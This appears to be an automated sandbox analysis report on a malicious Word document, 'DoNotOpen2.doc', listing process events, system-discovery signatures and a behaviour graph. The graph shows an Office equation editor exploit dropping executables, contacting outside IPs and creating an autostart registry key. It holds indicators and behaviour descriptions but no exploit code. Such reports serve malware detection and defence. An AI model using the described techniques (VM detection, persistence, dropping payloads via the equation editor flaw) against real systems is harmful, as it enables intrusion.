Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B3362 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_617B3362
Contains functionality to query the account / user nameShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__swprintf_c_l,3_2_00516DF6
Queries information about the installed CPU (vendor, model number etc)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor
Queries the product ID of WindowsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Uses the system / local time for branch decision (may execute only at specific dates)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005163DA GetLocalTime followed by cmp: cmp word ptr [esp+12h], 0010h and CTI: jne 005164DCh3_2_005163DA

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 487031 Sample: DoNotOpen2.doc Startdate: 24/01/2018 Architecture: WINDOWS Score: 96 31 Document exploit detected (drops PE files) 2->31 33 May check the online IP address of the machine 2->33 35 Contains functionality to detect virtual machines (IN, VMware) 2->35 37 8 other signatures 2->37 6 EQNEDT32.EXE 1 2->6         started        9 WINWORD.EXE 72 32 2->9         started        12 EQNEDT32.EXE 47 2->12         started        14 2 other processes 2->14 process3 file4 43 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->43 16 iexplore.exe 1 9 6->16         started        23 C:\Users\user~1\AppData\Local\Temp\a.b, PE32 9->23 dropped signatures5 process6 dnsIp7 25 api.ipaddress.com 16->25 27 api.ipaddress.com 209.126.119.177, 49188, 80 SERVER4YOU-server4youIncUS United States 16->27 29 103.236.150.14, 49189, 80 IDNIC-SERVERKEREN-AS-IDPTExaRekatekProsolusiID Indonesia 16->29 21 C:\Users\user\AppData\...21avShExt.dll, PE32 16->21 dropped 39 Creates an autostart registry key pointing to binary in C:\Windows 16->39 file8 41 May check the online IP address of the machine 25->41 signatures9

Simulations

Behavior and APIs

TimeTypeDescription
19:15:15API Interceptor340x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 5000ms
19:15:17API Interceptor3x Sleep call for process: EQNEDT32.EXE modified from: 60000ms to: 5000ms
19:15:18API Interceptor938x Sleep call for process: explorer.exe modified from: 60000ms to: 5000ms
19:15:20API Interceptor2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 5000ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot